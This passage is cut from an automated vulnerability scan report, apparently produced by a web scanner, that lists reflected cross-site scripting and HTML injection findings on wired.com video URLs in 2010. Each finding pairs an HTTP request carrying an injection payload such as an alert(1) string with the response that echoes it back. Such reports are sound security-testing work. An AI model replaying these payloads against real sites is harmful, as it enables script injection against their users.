Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29440
Vary: Accept-Encoding
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:40:45 GMT
Date: Mon, 22 Nov 2010 00:35:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoa9a36"><a>69c504b8c86 ss_latest-videos c_latest">
...[SNIP]...

1.1056. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ea9"><a>5355e0c47b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos27ea9"><a>5355e0c47b2/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:41:35 GMT
Date: Mon, 22 Nov 2010 00:36:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos27ea9"><a>5355e0c47b2 c_latest">
...[SNIP]...

1.1057. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b973"-alert(1)-"1cd8a1ddd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos7b973"-alert(1)-"1cd8a1ddd78/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:43 GMT
Date: Mon, 22 Nov 2010 00:37:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106800


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
pt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","664817239001","behind-the-scenes-doctor-who-the-hungry-earth","latest-videos7b973"-alert(1)-"1cd8a1ddd78","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1058. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1aa"><a>b764377f1e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest8e1aa"><a>b764377f1e7/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:42:49 GMT
Date: Mon, 22 Nov 2010 00:37:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest8e1aa"><a>b764377f1e7">
...[SNIP]...

1.1059. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"-alert(1)-"3d3ca4afe87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestf815d"-alert(1)-"3d3ca4afe87/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:52 GMT
Date: Mon, 22 Nov 2010 00:38:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1815816633","latestf815d"-alert(1)-"3d3ca4afe87","664817239001","behind-the-scenes-doctor-who-the-hungry-earth","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1060. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c31ad"-alert(1)-"cf3b712c3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633c31ad"-alert(1)-"cf3b712c3a/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:44:12 GMT
Date: Mon, 22 Nov 2010 00:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
pt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","664817239001","behind-the-scenes-doctor-who-the-hungry-earth","1815816633c31ad"-alert(1)-"cf3b712c3a","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1061. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f428a"-alert(1)-"7fe3d28d3e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earthf428a"-alert(1)-"7fe3d28d3e9/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=281
Expires: Mon, 22 Nov 2010 00:44:15 GMT
Date: Mon, 22 Nov 2010 00:39:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-doctor-who-the-hungry-earthf428a"-alert(1)-"7fe3d28d3e9","latest-videos","latest","1815816633","664817239001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1062. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6174"-alert(1)-"0c39f2dcc8b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001f6174"-alert(1)-"0c39f2dcc8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:50 GMT
Date: Mon, 22 Nov 2010 00:39:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
pt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","behind-the-scenes-doctor-who-the-hungry-earth","664817239001f6174"-alert(1)-"0c39f2dcc8b","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1063. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 85728--><script>alert(1)</script>6bb8ad67c22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29483
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:32 GMT
Date: Mon, 22 Nov 2010 00:35:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video85728--><script>alert(1)</script>6bb8ad67c22/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001
-->
...[SNIP]...

1.1064. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb4f"><a>5e07a67febf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8eb4f"><a>5e07a67febf/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29444
Vary: Accept-Encoding
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:38:55 GMT
Date: Mon, 22 Nov 2010 00:34:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8eb4f"><a>5e07a67febf ss_latest-videos c_latest">
...[SNIP]...

1.1065. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9a0"-alert(1)-"baca53fa180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos3b9a0"-alert(1)-"baca53fa180/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:41:26 GMT
Date: Mon, 22 Nov 2010 00:36:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos3b9a0"-alert(1)-"baca53fa180","latest","1815816633","behind-the-scenes-of-atts-distaster-response-team","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1066. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2782"><a>13c785d8e84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videose2782"><a>13c785d8e84/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:40:18 GMT
Date: Mon, 22 Nov 2010 00:35:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videose2782"><a>13c785d8e84 c_latest">
...[SNIP]...

1.1067. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b24ca"-alert(1)-"f6fa933e780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestb24ca"-alert(1)-"f6fa933e780/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:26 GMT
Date: Mon, 22 Nov 2010 00:37:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latestb24ca"-alert(1)-"f6fa933e780","1815816633","behind-the-scenes-of-atts-distaster-response-team","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1068. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79878"><a>7a4f304f4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest79878"><a>7a4f304f4cf/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
